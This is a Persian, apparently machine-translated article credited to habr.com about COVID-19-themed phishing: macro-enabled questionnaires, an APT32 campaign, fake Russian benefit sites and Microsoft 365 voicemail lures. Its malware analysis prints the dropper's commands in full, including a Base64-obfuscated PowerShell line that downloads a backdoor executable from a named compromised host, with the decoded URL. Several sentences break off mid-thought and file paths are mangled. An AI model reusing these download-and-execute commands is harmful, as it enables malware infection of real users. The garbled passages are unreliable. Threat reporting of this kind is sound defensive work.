مهاجمان همچنان از موضوع COVID-19 سوء استفاده می کنند و تهدیدات بیشتری را برای کاربرانی ایجاد می کنند که شدیداً به همه چیز مربوط به این بیماری همه گیر علاقه دارند. که در
به خاطر بسپارید
آیا می خواهید یک آزمایش رایگان برای COVID-19 انجام دهید؟
یکی دیگر از نمونه های قابل توجه فیشینگ با موضوع کروناویروس بود
متقاعد کردن بیشتر کاربران برای فعال کردن ماکروها نیز آسان بود. برای انجام این کار، از یک ترفند استاندارد استفاده شد: برای پر کردن پرسشنامه، ابتدا باید ماکروها را فعال کنید، به این معنی که باید یک اسکریپت VBA را اجرا کنید.
همانطور که می بینید، اسکریپت VBA به طور خاص از آنتی ویروس ها پوشانده شده است.
ویندوز دارای یک ویژگی انتظار است که در آن برنامه قبل از پذیرش پاسخ «بله» پیشفرض، /T <seconds> منتظر میماند. در مورد ما، اسکریپت قبل از حذف فایل های موقت 65 ثانیه منتظر ماند:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
و در حین انتظار، بدافزار دانلود شد. یک اسکریپت مخصوص PowerShell برای این کار راه اندازی شد:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
پس از رمزگشایی مقدار Base64، اسکریپت PowerShell درب پشتی واقع در وب سرور قبلی هک شده از آلمان را دانلود می کند:
http://automatischer-staubsauger.com/feature/777777.png
و آن را با نام ذخیره می کند:
C:UsersPublictmpdirfile1.exe
پوشه ‘C:UsersPublictmpdir’
هنگام اجرای فایل "tmps1.bat" که حاوی دستور است حذف می شود cmd /c mkdir ""C:UsersPublictmpdir"".
حمله هدفمند به سازمان های دولتی
علاوه بر این، تحلیلگران FireEye اخیراً یک حمله هدفمند APT32 را با هدف ساختارهای دولتی در ووهان و همچنین وزارت مدیریت اضطراری چین گزارش کردند. یکی از RTF های توزیع شده حاوی پیوندی به مقاله نیویورک تایمز با عنوان بود
جالب اینجاست که طبق گفته Virustotal، در زمان شناسایی، هیچ یک از آنتی ویروس ها این نمونه را شناسایی نکردند.
زمانی که وب سایت های رسمی از کار افتاده اند
بارزترین نمونه حمله فیشینگ همین روز پیش در روسیه اتفاق افتاد. دلیل این امر انتصاب مزایای مدتها مورد انتظار برای کودکان 3 تا 16 ساله بود. هنگامی که شروع پذیرش برنامه ها در 12 می 2020 اعلام شد، میلیون ها نفر برای کمک مورد انتظار به وب سایت خدمات دولتی هجوم بردند و پورتال را بدتر از یک حمله DDoS حرفه ای خراب کردند. وقتی رئیس جمهور گفت که «خدمات دولتی نمی توانند با جریان درخواست ها کنار بیایند»، مردم شروع به صحبت آنلاین درباره راه اندازی یک سایت جایگزین برای پذیرش درخواست ها کردند.
مشکل این است که چندین سایت به طور همزمان شروع به کار کردند، و در حالی که یکی، سایت واقعی در posobie16.gosuslugi.ru، در واقع برنامه ها را می پذیرد، بیشتر
همکاران SearchInform حدود 30 دامنه جدید جعلی را در منطقه .ru پیدا کردند. شرکت Infosecurity و Softline بیش از 70 وب سایت خدمات دولتی جعلی مشابه را از ابتدای آوریل ردیابی کرده اند. سازندگان آنها نمادهای آشنا را دستکاری می کنند و همچنین از ترکیب کلمات gosuslugi، gosuslugi-16، vyplaty، covid-vyplaty، posobie و غیره استفاده می کنند.
هایپ و مهندسی اجتماعی
همه این مثالها تنها تأیید میکنند که مهاجمان با موفقیت از موضوع کرونا درآمد کسب میکنند. و هر چه تنش اجتماعی بیشتر باشد و مسائل نامشخص تر باشد، کلاهبرداران شانس بیشتری برای سرقت داده های مهم دارند، افراد را مجبور می کنند تا خودشان پول خود را رها کنند یا به سادگی رایانه های بیشتری را هک کنند.
و با توجه به اینکه همهگیری افراد بالقوه ناآماده را مجبور کرده است که به طور انبوه از خانه کار کنند، نه تنها دادههای شخصی، بلکه اطلاعات شرکتی نیز در خطر است. به عنوان مثال، اخیراً کاربران مایکروسافت 365 (آفیس 365 سابق) نیز در معرض حمله فیشینگ قرار گرفتند. مردم پیامهای صوتی عظیم «از دست رفته» را به عنوان ضمیمه نامه دریافت کردند. با این حال، فایل ها در واقع یک صفحه HTML بودند که قربانیان حمله را به آن می فرستاد
منبع: www.habr.com